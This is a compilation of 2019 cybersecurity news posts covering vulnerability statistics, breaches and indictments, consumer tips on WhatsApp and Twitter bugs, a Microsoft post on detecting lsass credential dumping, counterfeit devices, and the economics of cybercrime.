There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high. The results were released in the Q1 2019 Vulnerability QuickView Report. CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities. Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD … More

The post Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector appeared first on Help Net Security.

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline of malware infection, most especially the lesser cases of ransomware compared to 2017. The European country of almost 5 million people is mirroring the global trend of cybersecurity issues, as cybercriminals are heavily transitioning from the disruptive and destructive ransomware to a silent yet very profitable phishing and cryptojacking. Ireland recorded in 2018 just 1.26% of monthly infection rate, which is one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017 when millions of computers worldwide were heavily infected by ransomware, more particularly the likes of WannaCry and NoPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like the rest of the programs in a computing device. But the consumed CPU/GPU resources does not produce a tangible output like a typical benign program but rather designed to compute for crypto-hashes in the attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that opens an opportunity for something that goes wrong to grow exponentially.

Also, Read:

5 Fundamental Cybersecurity Issues With Email

Will AI Solve the Gaming Industry’s Cybersecurity Issues?

How Healthcare Organizations Can Solve Cybersecurity Issues

Importance of Changes in Corporate Mindset in Preventing CyberSecurity Issues

Orange’s Acquisition of SecureLink, Set To Expand Cybersecurity Market

The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

Hacking the ‘Unhackable eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war to rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys expose users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker groups arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

How can we give cybersecurity analysts a helping hand?

It’s tough being a cybersecurity analyst these days. Over the last few years we have been repeatedly reminded of the challenge they are now facing, primarily through the steady stream of high-profile data breaches that have hit the headlines. In the last month alone Microsoft has been in the news after suffering a breach that enabled hackers to access customer email accounts, while a breach at beleaguered social giant Facebook was believed to have left … More

The post How can we give cybersecurity analysts a helping hand? appeared first on Help Net Security.

The largest breaches over the past three years have caused massive and irreparable damage

Publicly traded companies suffering the worst data breaches averaged a 7.5 percent decrease in stock price, a Bitglass report reveals. Bitglass researched the three largest data breaches of publicly traded companies from each of the last three years in order to uncover cybersecurity trends and demonstrate the extensive damage that can be done by improper security. Among the incidents detailed in the Kings of the Monster Breaches report are the Marriott breach of 2018, the … More

The post The largest breaches over the past three years have caused massive and irreparable damage appeared first on Help Net Security.

Analysis of device data shines a light on cybersecurity risks in healthcare

The convergence of IT, IoT and OT makes it more difficult for the healthcare industry to manage a wide array of hard-to-control network security risks. IoT and OT devices are rapidly increasing in numbers, but traditional IT still represents the most vulnerable attack surface, according to the Forescout Technologies report. Forescout Technologies announced insights from 75 real healthcare deployments with more than 10,000 virtual local area networks (VLANs) and 1.5 million devices contained within the … More

The post Analysis of device data shines a light on cybersecurity risks in healthcare appeared first on Help Net Security.

Identity theft victims could lead us to accept more security-improving friction

Far too many individuals who have never been victims of identity theft and financial crimes don’t understand how devastating those are to victims. “There are many victim services organizations that assist violent crime victims and the understanding of the trauma and the victim experience is not questioned (which is very appropriate and as it should be),” Eva Velasquez, president and CEO of the Identity Theft Resource Center (ITRC), told Help Net Security. After all, we … More

The post Identity theft victims could lead us to accept more security-improving friction appeared first on Help Net Security.

CISOs: What would you do over?

Just after the new year I was catching up with a CISO over lunch in Pike Place Market in Seattle. We were reminiscing about how tough it is to get a security program up and running in the beginning. Pausing to dip his taco in the excellent house salsa, he commented, “Y’know, if I had to do it all over again…” and he proceeded to tell me a story. My brain twitched with possibilities—here was … More

The post CISOs: What would you do over? appeared first on Help Net Security.

The six biggest cybersecurity risks facing the utilities industry

The utilities industry is rapidly modernizing its infrastructure, adding more digitized equipment and connectivity across devices, plants, and systems. This evolution to “smart infrastructure” represents a positive, paradigm shift for the industry. Unfortunately, the security policies of many utilities have not evolved along with it, leaving them incredibly vulnerable. Utilities are investing heavily to modernize infrastructure. In fact, ABI Research projects that the industry will spend US$14 billion a year between 2018 and 2023 — … More

The post The six biggest cybersecurity risks facing the utilities industry appeared first on Help Net Security.

The Latest Techniques Hackers are Using to Compromise Office 365

It was only a few years back that cloud technology was in its infancy and used only by tech-savvy, forward-thinking organisations. Today, it is commonplace. More businesses than ever are making use of cloud services in one form another. And recent statistics suggest that cloud adoption has reached 88 percent. It seems that businesses now […]… Read More

The post The Latest Techniques Hackers are Using to Compromise Office 365 appeared first on The State of Security.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, cybercriminals first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

Feds Break Up Major SIM-Hijacking Ring

The U.S. Department of Justice announced that it has arrested and charged members of a major cybercriminal ring in connection with $2.4 million worth of wire fraud and identity theft.

The hacking group, called “The Community” primarily used social engineering (trickery) and SIM card hijacking to steal funds and cryptocurrency from their victims.

SIM swapping or hijacking is an attack that often deploys personal information gleaned from other sources (such as social engineering) to authenticate a fraudster to a mobile phone company. Once authenticated, the mobile phone number of the target victim is moved to the criminal’s phone. Possession of the target’s phone number allows the criminal to access calls and texts intended for the target, therefore making it possible to bypass his or her 2-Factor authentication and thus gain access to the victim’s financial accounts.

Members of The Community face charges of wire fraud and aggravated identity theft. Three former mobile provider employees are also charged with accepting bribes to facilitate SIM-card hijacks for the group.

Read more about the story here.

 

 

 

The post Feds Break Up Major SIM-Hijacking Ring appeared first on Adam Levin.

What does it take to be an infosec product strategist?

Choosing a security product that will best fit your organization’s needs is a challenge exacerbated by the “polluted, turbulent sea of ineffectual security products” that you’ll need to wade through in order to find the right and effective solution. “I tend to maintain an overwhelming sense that the majority of security products exist ‘just because’ – ‘just because’ the underlying technology seemed cool to build, ‘just because’ it is what has always been used despite … More

The post What does it take to be an infosec product strategist? appeared first on Help Net Security.

Security spring cleaning: 5 tips for tidying up network safeguards

Networks need regular cleaning just like your home, car or garage. Why? The answer is simple – poor security hygiene can lead to major data breaches. If you don’t regularly review your network, potential weaknesses and vulnerabilities will stack up. As we enter into spring cleaning season, now is as good a time as any for IT administrators and security professionals to catch up on yearly security maintenance. Here are several tasks that should be … More

The post Security spring cleaning: 5 tips for tidying up network safeguards appeared first on Help Net Security.

Cybersecurity, privacy and technologies still top challenges for IT audit teams and leaders

Cybersecurity, privacy and technologies—from mission-critical to digitally transformative—top the list of challenges IT audit teams and leaders grapple with every day, according to a study conducted by ISACA and Protiviti. An executive summary of the study notes the growing role and responsibilities of IT audit in digital transformation, partnerships between the IT organization and IT audit function, and differences in how IT audit leaders operate compared to other IT audit professionals. The 2019 IT Audit … More

The post Cybersecurity, privacy and technologies still top challenges for IT audit teams and leaders appeared first on Help Net Security.

Employees are aware of USB drive security risks, but don’t follow best practices

Employees are aware of the risks associated with inadequate USB drive security – yet their employers aren’t mandating following best practices, according to a report by Apricorn. “The State of USB Data Protection 2019: Employee Spotlight” survey report, which polled nearly 300 employees across industries including education, finance, government, healthcare, legal, retail, manufacturing, and power and energy, examined year-over-year trends of USB drive usage, policies and business drivers. The report reveals that while employees have … More

The post Employees are aware of USB drive security risks, but don’t follow best practices appeared first on Help Net Security.

The iOS Twitter Bug: 3 Tips to Protect Your Location Data

Many of us use social media to keep our family and friends up-to-date on our everyday lives. We don’t typically expect social media companies to keep their partners updated on our every move as well. But for some Twitter users, this is exactly the situation they’ve found themselves in. On Monday afternoon, the social media company disclosed a bug that resulted in some Twitter users’ locations being shared with an unnamed Twitter partner.

So, how exactly did this bug disclose the locations of certain Twitter users? The social network accidentally sent advertising partners location data for a process called real-time bidding. This process lets advertisers pay for space based on certain users’ locations. Twitter intended to remove the location data from what it sent to its partners but failed to do so. Affected users include those who had more than one Twitter account on an iOS device. If the user chose to share their precise location on one account, Twitter says it may have collected and shared data for the other account on the same mobile device even if that account had opted out of location sharing. Although the location data was “fuzzed” to only show a ZIP code or city, it is still unclear as to how long this location sharing took place.

According to Twitter, the location data was not retained by the partner and they have fixed the problem to ensure that it doesn’t happen again. And while affected users have already been notified by the social network, there are some steps users can take to help protect their data:

  • Turn off location services. While social media is meant for sharing, there is some information, like your location, that ought to be kept private. If a cybercriminal knows where you are at a specific point in time, they could potentially use that information to your disadvantage. Consider your overall privacy and opt out of sharing your location data with social media platforms.
  • Update, update, update. No matter what type of bug might be affecting a certain platform, it’s always crucial to keep your software up-to-date. Turning on automatic updates will ensure that you are always equipped with the latest patches and security fixes.
  • Use a comprehensive security solution. Using a solution like McAfee Total Protection helps to add an extra layer of security in case a bug does expose your device or data.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The iOS Twitter Bug: 3 Tips to Protect Your Location Data appeared first on McAfee Blogs.

Chinese National Indicted For Anthem’s 2015 Massive Data Breach

The U.S. Department of Justice State Prosecutors found probable cause to charge 32-year old Fujie Wang, a Chinese national for allegedly responsible for the data breach in Anthem, a health insurance firm, four years ago in 2015. The incident which resulted in Anthem losing control of at least 78.8 million records. Accused as a member of a Chinese hacking syndicate, Wang is now facing four cases of:

  • Intentional damage to a Protected Computer
  • Conspiracy to Commit Wire Fraud
  • Conspiracy to Commit Fraud
  • And other Related Activity in Connection with Computers

Anthem in 2015 confirmed that 78.8 million of their customers had their information was stolen, which included their full names, birth dates, addresses, employment information, and its corresponding income data, medical information and social security numbers. Aside from him, the other suspects that are still at large at the time of this writing were using their online aliases of Zhou Zhihong, Kim Young and Deniel Jack.

The Federal Bureau of Investigation before Wang was arrested posted a wanted notification to inform the public that the authorities was looking for him:

Federal Bureau of Investigation

The allegations in the indictment unsealed today outline the activities of a brazen China-based computer hacking group that committed one of the worst data breaches in history. These defendants allegedly attacked U.S. businesses operating in four distinct industry sectors, and violated the privacy of over 78 million people by stealing their personal identifiable information,” explained Brian Benczkowski, U.S. Assistant Attorney General.

Unlike a typical breach where an attacker takes out the information stored in the target company’s website, cloud storage or server in a 1-time, big time event, Wang’s team were very deliberate with the infiltration by using stealthy techniques. The indictment decision of the DOJ coincides with the current trade negotiations between China and the United States in hopes to harmonize if not end the current trade war happening between the two top economies of the world.

Aside from Anthem, Wang is also facing charges for infiltrating three more businesses which the DOJ has refused to name but hinted that those were from the communication, technology industry and basic industrial material sector respectively. Anthem was also lax when it comes to training their employees with cybersecurity topics such as anti-phishing techniques to minimize the chance for them to fall for online frauds and scams. The primary suspect on how Anthem’s system was infiltrated was due to an employee with privileged access to the system opened a malicious email, through clever social engineering method, the contents of the email was able to convince the user to open a phishing link or an attachment which contains a malware dropper.

October 20, 2018, hackercombat.com broke the story about Anthem’s decision to pay their affected stakeholders $16 million as settlement for their data breach episode. It was labeled as the “biggest sum gathered by the government in a healthcare data breach”. This was the result of Anthem’s verification of their own systems, and most of the amount will be paid for the credit monitoring and identity theft protection of all its affected customers.

Source: https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/

Also, Read:

Data Breaches in Healthcare Comes From Within

Data Breach at Georgia Tech Impacts 1.3 Million People

Tougher Legislation Proposed in California For Data Breaches

All about Data Breaches, How They Happen and Their Impact

500px’s Data Breach, Happening Since July 2018

 

The post Chinese National Indicted For Anthem’s 2015 Massive Data Breach appeared first on .

Detecting credential theft through memory access modelling with Microsoft Defender ATP

Stealing user credentials is a key step for attackers to move laterally across victim networks. In today’s attacks, we see a range of tools used to achieve credential theft, requiring protections that target the root behavior and not just individual known tools as is often done by traditional antimalware software.

Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP), Microsoft’s unified endpoint protection platform, uses multiple approaches to detect credential dumping. In this post, we’ll discuss one of them: a statistical approach that models memory access to the Local Security Authority Subsystem Service (lsass.exe) process.

The lsass.exe process manages many user credential secrets; a key behavior associated with credential theft, and therefore common across many tools used by attackers, is to read large amounts of data from this process’ memory space.

Microsoft Defender ATP instruments memory-related function calls such as VirtualAlloc and VirtualProtect to catch in-memory attack techniques like reflective DLL loading. The same signals can also be used to generically detect malicious credential dumping activities performed by a wide range of different individual tools.

A statistical approach to detecting credential theft

Reviewing the behavior of multiple known tools, we see that the number and size of memory reads from the lsass.exe process related to credential dumping are highly predictable. The diagram below shows a (slightly simplified) view of this.

Fig1-number-of-read-perations-vs-number-of-bytes-read

By contrast, legitimate reads from the lsass.exe process, such as routine handling of users signing in, fall outside this cluster.

Microsoft Defender ATP uses such a model to discriminate between expected and unexpected accesses to lsass.exe process memory, and raise an alert in the latter case:

Fig2-Sensitive-credential-memory-read

Microsoft Defender ATP’s process tree view of the alert identifies the tool performing the suspicious credential access activity, in this example, sqldumper.exe. This is a legitimate administrator tool found on many database servers, but attackers have been known to abuse it to dump credentials to avoid the risk of downloading custom tooling that may be flagged by antimalware solutions.

Fig3-Alert-process-tree

Similarly, Microsoft Defender ATP detects attacker abuse of otherwise legitimate administrator tooling, such as the Microsoft Sysinternals tool ProcDump or Task Manager, when these are repurposed to dump lsass.exe process memory. Attackers take this approach, sometimes referred to as living-off-the-land, to avoid tools that they know are commonly detected as malicious. In the memory-dumping scenario described here, they may even exfiltrate the memory dump and perform the credential extraction offline rather than on the victim machine.

Over time we have also seen Microsoft Defender ATP identify several distinct custom tools using this memory modelling technique. A couple of open-source examples are shown here.

Fig4-Sample-open-source-tools

Foiling cyberattacks by stopping credential theft

In this blog post we illustrated one of several ways in which Microsoft Defender ATP detects credential theft. Security operations (SecOps) teams can use the alerts in Microsoft Defender ATP to quickly identify and respond to attacks: stopping credential dumping techniques empowers SecOps to resolve cyberattacks before the latter stages, such as lateral movement, command-and-control, and exfiltration.

Microsoft Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks. Enhanced instrumentation and detection capabilities in Microsoft Defender ATP can better expose covert, sophisticated attacker techniques like credential theft and other in-memory attacks. Microsoft Defender ATP demonstrated its strength in detecting credential dumping and other high-impact attacker techniques in MITRE’s evaluation of EDR solutions.

Microsoft Defender ATP contributes to and benefits from security signals shared across Microsoft’s security solutions through Microsoft Threat Protection, which provides seamless, integrated, and comprehensive security across multiple attack vectors. The enriched security data drives stronger protection and the orchestration of threat remediation across identities, endpoints, email and data, apps, and infrastructure.

To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

To learn more about Microsoft Threat Protection, read our monthly updates on the evolution of this comprehensive security solution.

 

 

Rob Mead and Tim Burrell
Microsoft Threat Intelligence Center

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

 

The post Detecting credential theft through memory access modelling with Microsoft Defender ATP appeared first on Microsoft Security.

5 Cyber Security Best Practices For Your Small to Medium-Size Business

Estimated reading time: 2 minutes

Small to medium-sized businesses often tend to underestimate cybersecurity. The reasons range from practicality – they may not have the resources, to sheer over-confidence – the notion that they are not important enough to be at risk of cybersecurity threats and so on. Nothing could be further than the truth.

A survey by the United Kingdom government and KPMG among 1,000 small businesses in the country, threw up worrisome statistics: Only 23% of small businesses felt cyber security was a top security concern while 29% of businesses who had not experienced a breach felt they would suffer reputational damage. Another worrying statistic arrived from another report: at least 61 percent of the hacked industries and enterprises functioned with a smaller workforce, i.e. not even 1,000 employees.

Even if a business is small or medium-sized, it does not mean it is not at risk of cybersecurity threats. In fact, it may well be the opposite – they are sitting ducks as cyber criminals are aware that SMEs may not be as concerned about their security compared to bigger businesses. In fact, the consequences may be even more severe – even a minor data breach could leave a SME crippled and unable to recover.

Its clear then that SMEs must be extremely serious when it comes to cybersecurity. Here are some of the best practices they must follow:

Invest in Training – Since most cybersecurity risks primarily originate due to user negligence, it is important to train and educate employees about cybersecurity. Employees should know what to do in case of security alerts and they should also understand to be cautious about what links they click on, what information they share and what USB devices they plug in their machines.

Have a MDM plan – With almost all employees owning a plethora of gadgets and smartphones, it is crucial for SMEs to regulate the usage of these devices. A lot of sensitive information and emails can be accessed on these devices and they also contain access to the company’s wireless networks. So monitoring and regulating such mobile devices is essential.

Backup Data – When it comes to data backup, we recommend following the 3-2-1 rule. As per this, SMEs should maintain 3 different copies of all their sensitive data, over 2 different formats and locations and at least 1 of these locations should be offline. Following this rule will ensure that all confidential company information remains in the hands of the organization itself.

Data Encryption – Simply saving and storing data is not enough anymore, as it can be breached and accessed at any time. It is always advisable to encrypt data when it is saved and backed up. Access to this data should only be granted to specific people and such security measures help enterprises maintain the integrity of their critical data in the long term.

Use a Security Solution – When it comes to effective enterprise security solutions, there is no dearth of options available in the market. It is important to choose a solution that meets the exact requirements of the organization, and does exactly what it promises to do. Extra features and customizations can always be added later, so the SME should know its precise needs before choosing a solution.

The post 5 Cyber Security Best Practices For Your Small to Medium-Size Business appeared first on Seqrite Blog.

Avoid a Security Endgame: Learn About the Latest “Avengers” Scam

Marvel Studio’s $2.2 billion box-office hit “Avengers: Endgame” has quickly risen to the second-highest grossing film of all time in its first two weekends. Not surprisingly, cybercriminals have wasted no time in capitalizing on the movie’s success by luring victims with free digital downloads of the film. How? By tempting users with security shortcuts so they can watch the film without worrying about spoilers or sold-out movie tickets.

When a victim goes to download the movie from one of the many scam sites popping up around the web, the streaming appears to begin automatically. What the user doesn’t know is that the footage being streamed is just from the movie’s trailer. Soon after, a message pops up stating that the user needs to create an account to continue with the download. The “free” account prompts the user to create a username and password in advance, which could potentially be useful for cybercriminals due to the common practice of password reuse. Once a victim creates an account, they are asked for billing information and credit card details in order to “verify location” and make sure the service is “licensed to distribute” the movie in the victim’s region. These crooks are then able to scrape the victim’s personal and financial data, potentially leading to online account hacks, stolen funds, identity theft, and more.

Luckily, Marvel fans can protect their online data to avoid a cybersecurity endgame by using the following tips:

  • Look out for potential scam activity. If it seems too good to be true, then it probably is. Be wary of websites promising free movie downloads, especially for movies that are still in theaters.
  • Shield your financial data. Be suspicious of “free downloads” that still require you to fill out billing information. If an unknown website asks for your credit card information or your bank account data, it’s best to avoid the site altogether.
  • Make sure your credentials are unique. With this scam, threat actors could use the login credentials provided by the victim to access their other accounts if they didn’t have a unique login. Avoiding username and password reuse makes it a lot harder for cybercriminals to hack into your other online accounts if they gain access to one.
  • Assemble a team of comprehensive security tools. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links and will warn you in the event that you do accidentally click on something malicious.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Avoid a Security Endgame: Learn About the Latest “Avengers” Scam appeared first on McAfee Blogs.

U.S. Energy Grid Experiences Possible Cyberattack

An apparent denial of service attack caused a disruption in a segment of the U.S. energy grid affecting Utah, Wyoming, and Southern California.

Little is currently known about the incident. It occurred March 5th, disabling several security devices. An unnamed utility company reported the incident to the Department of Energy.

“There was a denial-of-service attack…and that basically led operators to not be able to see what was going on in the grid,” said journalist Blake Sobczak, who initially reported the story. “As long as nothing crazy happens, you should be fine, but it certainly constitutes a disruption and a reportable event here to the Department of Energy.”

While the potential cyberattack did not lead to any known outages or interruptions in service and used a relatively unsophisticated method, it is noteworthy for being the first known incident to successfully target the nation’s energy infrastructure. Hackers targeting the U.S. energy grid have been theoretical up to this point, but security experts have long maintained that the infrastructure is poorly secured and that many utility companies are unprepared when it comes to cyber defense.

Fears of an attack on utilities have increased in the wake of Russian infiltration of U.S. critical infrastructure announced in 2018 by the Department of Homeland Security.

The post U.S. Energy Grid Experiences Possible Cyberattack appeared first on Adam Levin.

Cybersecurity Leaders Are Talking A Lot About Counterfeit Devices

Malice Vs Greed

Most discussion about security in the supply chain has been focused on detecting tampering, or preventing backdoors or sneaky things being inserted into components and software. There’s another aspect emerging and will dwarf the tampering: devices that are counterfeited for profit indirectly causing security problems. Counterfeit devices are ones that either by design not what you think you are buying, or are mislabeled intentionally to make an older or different model appear to be a more desirable one. Like money, if it is printed by the forger or has a zero added to the number on a legitimate note neither is what you expected or paid for. The motivation is greed but there is a significant impact on security.

Counterfeit Devices Already A Big Issue in Healthcare and Hurt Security

Last year we studied the security of medical devices market. There’s a healthy and legitimate market for used medical devices. Not surprisingly newer devices command a higher price than older ones. The medical community wisely pushed for a universal barcode that formed a Unique Device Identifier (UDI), so devices can be inventoried, their ownership lineage known, and information about them collected (e.g. location). UDI should be a useful tool for security operations, such as patching. If the UDI tells me that this device is an XYZ version 2014 monitoring device, then I can make sure it is patched using the most recent accepted update.

So here is where greed, safety and security collide. Unscrupulous resellers can have counterfeit UDIs applied, making the older medical devices appear to be a newer vintage. Making that XYZ v2014 appear to be a more valuable v2018 can be big money with clear problems related to product recalls and paying too much. But applying a v2018 patch to a v2014 device can have unintended consequences such as bricking the device, leaving vulnerabilities open, or causing the device to malfunction. Desktop operation systems are robust, with dialogues and checks to minimize and usually avoid the misapplication of patches and updates. But almost all of IoT and a lot of medical devices don’t have that robustness. If you’ve ever ‘flashed the CMOS’ of a device, such as a router or camera you know it generally to be a black box process with little if no feedback. Swapped UDIs are part of the problem, with the other part being outright counterfeit devices that may or not have the same software.

This sounds kind of like a rare issue? Nuh uh. The World Health Organization estimates that about 8% of medical devices are counterfeit.

The Trends Making Counterfeiting A Bigger Temptation in Enterprise IT

Several forces are colliding and making this a concern. IoT growth is the big one. The proliferation of more devices joining enterprise networks and at a continually increasing rate means more new devices are being added, and more ‘dumb’ devices that are already on premises are becoming connected or ‘smart.’. Scale is an issue because the growth of IoT challenges traditional network inventory, SIEM, and patch management tools. So inventory and patch management is being strained and a lot slips through the cracks in most companies, and that aids the counterfeiters’ jobs.

The second change is Increased reliance on the ‘smartness’ IoT means that the IT aspects of Things are becoming a core capability: for example, the flow reporting via wireless of a pump is as valued as the function of the pump itself, and the electronic displays in cars are no longer only for entertainment but are now required for critical function such as speedometer and vehicle controls.

The third change is heterogeneity. There’s more brands of products and a faster rate of change in networks. Most enterprises have a multi-vendor network for their switches and routers already. Opening up branch offices to local internet has meant more brands and models. And there’s always more security appliances in the racks, especially in enterprises. Supply chain change means decreasing traditional procurement for enterprises, and the increased complexity of components sourcing for IT appliances and devices.

Why Is This A Bigger Security Concern Now?

All this scale, smartness and complexity means that there is an increased temptation and security impact for counterfeiting. Scale means falsely satisfying demand with older devices can be profitable but those devices may not operate correctly when patched, or cannot be patched at all. Counterfeit devices that are not patched or are designed less securely than the intended mean that smarter devices have a greater impact than when less interaction was the norm. Heterogeneity of components and supply chain means that there is a greater opportunity for counterfeiting, with it being harder to detect counterfeit components and there are more links in the supply chain involving more people with more potential for tampering.

Network and Security Devices Are the Next Wave of Counterfeiting

Counterfeit It and IoT components are bad enough, but there is an emerging greater threat. There have been recent cases seen where counterfeit security and networking devices have been sold: the very things that are the best line of defense against counterfeit devices and the security impact they can have are themselves being counterfeited. Using the counterfeit currency analogy, this is the equivalent of having counterfeits of the devices that scan currency to detect forgeries.

What Enterprises Need to Do

The best change that can be made is to make supply chain integrity includes counterfeit detection. In other words, whereas most supply chain integrity is not losing links in the chain, making sure those are valid links needs to be re-emphasized or added. High capability organizations are likely already doing this, but this is frankly rare. Changes in procurement can be a big part of this, including asking vendors what supply chain integrity steps they themselves take. It may mean “lowest cost” has to be amended to ‘lowest cost authentic.”

Most vulnerability management includes the inventory step (find what we have), and patch management. Increasing validation of inventory results can be a great first step. When the inventory is assumed, or based upon procurement it needs to have a validation step, i.e. we have 20 type Xv2 routers in the inventory let’s make sure those are really type X and v2.

Although the impacts of counterfeiting-for-greed won’t be only security related (e.g. malfunctioning medical devices), security organizations are the best positioned to lead these efforts.

The post Cybersecurity Leaders Are Talking A Lot About Counterfeit Devices appeared first on .

Cybercrime and Fraud Part 1: Modern Tales of Piracy and Plunder

Calico Jack, Captain Blood, and Blackbeard. So many recognizable stories, books, and movies have been made about the period of stealing and looting exemplified by the golden age of piracy. Time will tell whether we see such romanticized stories of dashing rogues based on this new golden age of criminality that we now live in. In fact, if you look at the FBI’s statistics, the internet has enabled cybercriminals to increase their ill-gotten gains by 700% in 10 years (2007-2017). To put that in perspective, when pirates looted and plundered their way across the seven seas, the top 20 pirates ever stole about $615.5 million when adjusted to 2017 dollars. Flash forward several hundred years and compare that to the takings from cybercrime in the US alone, where the FBI has just released new estimate losses exceeding $2.7 billion in 2018!

In this series of blogs, I’ll be exploring cybercrime and fraud, outlining some of the strategies that you can adopt to help mitigate risk, and how you can use Cisco products and technologies to help implement those strategies.

So, let’s delve into this golden age of criminality in a little more detail. First, it’s important to realize that the scale of this illicit profit has brought with it a tremendous amount of professionalism. This is illustrated by the fact that while losses have increased 700%, the number of incidents has only increased by 50%, resulting in a much higher loss per incident. Of course, the FBI only has a US-centric view, so how representative is it globally? If we consider research from the Center for Strategic and International Studies (CSIS), the estimated global cost of cybercrime is 0.59% to 0.8% of GDP ($445 billion to $608 billion). Furthermore, if we then compare that to the value that the UN Office on Drugs and Crime (UNODC) assigns to the global cost of the illicit drugs trade of 0.5% to 0.6% of GDP, you realize that the cybercrime market is at least as big, if not bigger, than the global trade in illicit drugs! With such profits obtained at risks that are fractional compared to other criminal enterprises, it’s easy to see why cybercrime remains an attractive and growing area for professional criminals.

So how much could it continue to grow? Are we already at peak cybercrime? In October 2017, BITKOM (German Association for Information Technology, Telecommunications and New Media) published a survey that showed 49% of German internet users had been a victim of cybercrime. Furthermore, if we compare this to an analysis from the US Department of Justice looking at the Lifetime Likelihood of Victimization that estimated that 99% of people would be a victim of robbery at least once and that 87% of people would be a victim 3 or more times, and you can see that, depressingly, there appears to remain a significant growth prospect for cybercrime.

